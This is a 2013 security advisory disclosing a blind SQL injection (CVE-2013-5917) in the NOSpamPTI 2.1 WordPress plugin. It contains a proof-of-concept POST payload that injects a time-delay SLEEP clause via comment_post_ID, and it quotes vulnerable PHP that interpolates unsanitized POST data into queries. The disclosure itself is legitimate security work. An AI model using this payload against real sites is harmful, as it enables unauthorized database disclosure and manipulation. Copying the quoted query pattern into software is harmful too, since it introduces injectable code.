[ NOSpamPTI Wordpress plugin Blind SQL Injection ]
[ Vendor product description ]
NOSpamPTI eliminates the spam in your comment box so strong and free,
developed from the idea of Nando Vieira <a href="http://bit.ly/d38gB8"
rel="nofollow">http://bit.ly/d38gB8</a>, but some themes do not support
changes to the functions.php to this we alter this function and
available as a plugin. Make good use of this plugin and forget all the Spam.
[ Bug Description ]
NOSpamPTI contains a flaw that may allow an attacker to carry out a
Blind SQL injection attack. The issue is due to the wp-comments-post.php
script not properly sanitizing the comment_post_ID in POST data. This
may allow an attacker to inject or manipulate SQL queries in the
back-end database, allowing for the manipulation or disclosure of
arbitrary data.
[ History ]
Advisory sent to vendor on 09/09/2013
Vendor reply 09/20/2013. According the vendor, the plugin was deprecated.
[ Impact ]
HIGH
[ Afected Version ]
2.1
[ CVE Reference]
CVE-2013-5917
[ POC ]
Payload:
POST /wordpress/wp-comments-post.php
author=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1
AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1
[ Vulnerable code ]
$post_id = $_POST['comment_post_ID'];
load_plugin_textdomain('nospampti',
WP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');
if ($hash != $challenge) {
$wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID =
{$comment_id}");
$count = $wpdb->get_var("select count(*) from $wpdb->comments
where comment_post_id = {$post_id} and comment_approved = '1'");
[ Reference ]
[1] No SpamPTI SVN repository -
http://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php
[2] Owasp - https://owasp.org/index.php/SQL_Injection
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/
--------------------------------------------
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos
